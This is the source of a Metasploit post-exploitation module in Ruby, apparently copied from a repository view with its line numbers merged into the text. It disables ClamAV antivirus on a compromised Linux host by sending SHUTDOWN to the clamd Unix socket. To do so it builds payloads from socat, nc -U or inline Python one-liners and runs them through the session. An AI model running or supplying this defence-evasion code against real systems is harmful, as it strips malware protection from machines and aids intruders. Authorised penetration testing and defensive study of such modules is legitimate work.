Path: blob/master/modules/post/linux/manage/disable_clamav.rb
19612 views
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Post6include Msf::Post::File7include Msf::Post::Unix89def initialize(info = {})10super(11update_info(12info,13'Name' => 'Disable ClamAV',14'Description' => %q{15This module will write to the ClamAV Unix socket to shutoff ClamAV.16},17'License' => MSF_LICENSE,18'Author' => [19'DLL_Cool_J'20],21'Platform' => [ 'linux' ],22'SessionTypes' => [ 'meterpreter', 'shell' ],23'Notes' => {24'Stability' => [SERVICE_RESOURCE_LOSS],25'Reliability' => [],26'SideEffects' => [IOC_IN_LOGS]27}28)29)30register_options(31[32OptString.new('CLAMAV_UNIX_SOCKET', [true, 'ClamAV unix socket', '/run/clamav/clamd.ctl' ]),33OptString.new('COMMAND', [true, 'ClamAV command to execute', 'SHUTDOWN' ])34]35)36end3738def run39clamav_socket = datastore['CLAMAV_UNIX_SOCKET']40cmd = datastore['COMMAND']4142if command_exists?('socat')43print_good('socat exists')44payload = "echo #{cmd} | socat - UNIX-CONNECT:#{clamav_socket}"45elsif command_exists?('nc')46print_good('nc exists')47payload = "echo #{cmd} | nc -U #{clamav_socket}"48elsif command_exists?('python')49print_good('python exists')50payload = "python -c \"import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{clamav_socket}'); sock.send('#{cmd}'.encode());\""51elsif command_exists?('python3')52print_good('python3 exists')53payload = "python3 -c \"import socket; sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM); sock.connect('#{clamav_socket}'); sock.send('#{cmd}'.encode());\""54else55fail_with(Failure::NotFound, 'No suitable binary found on the target host. Quitting!')56end5758print_status("Checking file path #{clamav_socket} exists and is writable... ")59print_bad('File does NOT exist or is not writable!') unless writable?(clamav_socket.to_s)60print_good('File does exist and is writable!')61print_good("Sending #{cmd}...")62cmd_exec(payload)63end64end656667